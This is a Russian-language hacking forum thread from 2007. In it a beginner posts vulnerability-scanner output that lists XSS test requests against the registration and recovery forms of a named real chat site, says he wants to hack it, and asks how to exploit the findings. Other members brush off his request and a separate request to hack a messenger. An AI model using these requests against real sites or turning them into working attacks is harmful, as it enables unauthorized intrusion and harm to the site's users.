Ответьте на вопросы начинающих
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Ответьте на вопросы начинающих - 2007-11-16 17:52:34.703333
|
|
|
Taraseika
Сообщений: 98
Оценки: 0
Присоединился: 2007-09-07 19:32:59.486666
|
1. Как можно зделать чтобы мой номер ICQ не находился ( искался только по нику )
2. Я вот тут решил взламывать сайт, вот что мне выдал X-Spider:
Уязвимость
Межсайтовый скриптинг (XSS)
Описание
Dозможно выполнение атаки межсайтовый скриптинг.
Запрос для выполнения атаки:
POST /registration/ HTTP/1.1
Host: www.chatufa.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
login=1&password=1&password_2=1&email=scanner@ptsecurity.com&question=1&answer=1&control=1&capcha=1&capcha_public_key=1&submit=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
Уязвимость
Межсайтовый скриптинг (XSS)
Описание
Dозможно выполнение атаки межсайтовый скриптинг.
Запрос для выполнения атаки:
POST /registration/ HTTP/1.1
Host: www.chatufa.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
login=1&password=1&password_2=1&email=scanner@ptsecurity.com&question=1&answer=1&control=1&capcha=1&capcha_public_key=1&submit=%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C
Уязвимость
Межсайтовый скриптинг (XSS)
Описание
Dозможно выполнение атаки межсайтовый скриптинг.
Запрос для выполнения атаки:
POST /registration/ HTTP/1.1
Host: www.chatufa.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
login=1&password=1&password_2=1&email=scanner@ptsecurity.com&question=1&answer=1&control=1&capcha=1&capcha_public_key=1&submit=%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E
Уязвимость
Межсайтовый скриптинг (XSS)
Описание
Dозможно выполнение атаки межсайтовый скриптинг.
Запрос для выполнения атаки:
POST /recovery/ HTTP/1.1
Host: www.chatufa.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
name=%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E&name_submit=1
Доступна информация
Доступен метод TRACE
Описание
С помощью использования метода TRACE в протоколе HTTP возможно выполнение атаки межсайтовый скриптинг.
Доступна информация
Список форм
Описание
Список форм использующихся для передачи данных на сервер:
POST / HTTP/1.1
login=&password=&submit_login=&country=®ion=&city=&start_age=&end_age=&city_all=&show_city=
POST /main/ HTTP/1.1
login=&password=&submit_login=&country=®ion=&city=&start_age=&end_age=&city_all=&show_city=
POST /love/ HTTP/1.1
login=&password=&submit_login=&country=®ion=&city=&start_age=&end_age=&city_all=&show_city=
POST /photo/ HTTP/1.1
login=&password=&submit_login=&pic_id=&only=&save=&voting_submit=&add_comm=&page_n=&sex=
POST /users/ HTTP/1.1
login=&password=&submit_login=&like_name=&search=
POST /shop/ HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /king/ HTTP/1.1
login=&password=&submit_login=&money=&money_add=
POST /login/ HTTP/1.1
login=&password=&submit_login=
POST /registration/ HTTP/1.1
login=&password=&password_2=&email=&question=&answer=&control=&capcha=&capcha_public_key=&submit=
POST /static/2/ HTTP/1.1
login=&password=&submit_login=
POST /static/4/ HTTP/1.1
login=&password=&submit_login=
POST /shop/1 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/2 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/3 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/4 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/5 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/6 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/7 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/9 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/11 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/12 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/13 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/14 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/15 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/16 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/17 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/18 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /shop/19 HTTP/1.1
login=&password=&submit_login=&cel_photo=&cel_inviz=&cel_rate=&cel_vip=&cel_stat=
POST /recovery/ HTTP/1.1
name=&name_submit=
Как воспользоваться этими штуками, я чёто пробовал пробовал но нечё неполучилось[&o]
|
|
|
|
|
RE: Ответьте на вопросы начинающих - 2007-11-16 18:31:21.260000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
ДЛЯ НАЧИНАЮЩИХ ЕСТЬ ФОРУМ ДЛЯ НАЧИНАЮЩИХ!!!!!!!!!
|
|
|
|
|
RE: Ответьте на вопросы начинающих - 2007-11-17 03:07:52.360000
|
|
|
Layla
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-16 06:59:39.046666
|
Есть хоть кто-нить кто бы подсказал мне как сломать yahoo!messager ??????
|
|
|
|
|
RE: Ответьте на вопросы начинающих - 2007-11-17 14:14:37.730000
|
|
|
HackGir[
Сообщений: 176
Оценки: 0
Присоединился: 2007-11-02 19:01:13.606666
|
Есть.Заходишь на страницу yahoo!,распечатываешь сие добро,потом нужно взять два куска стекла и промеж них вклеить наш листочек.Теперь самое главное.Берешь кувалду и ломаешь сие добро.
Поздравляю,Ватсон,вы справились!
|
|
|
|
|
RE: Ответьте на вопросы начинающих - 2007-11-17 14:51:14.566666
|
|
|
Сrash Override
Сообщений: 622
Оценки: 0
Присоединился: 2004-10-27 14:43:53
|
quote:
ORIGINAL: Layla
Есть хоть кто-нить кто бы подсказал мне как сломать yahoo!messager ??????
Нет никто не подскажет. Иди в жопу отсюда.
|
|
|
|
|
|
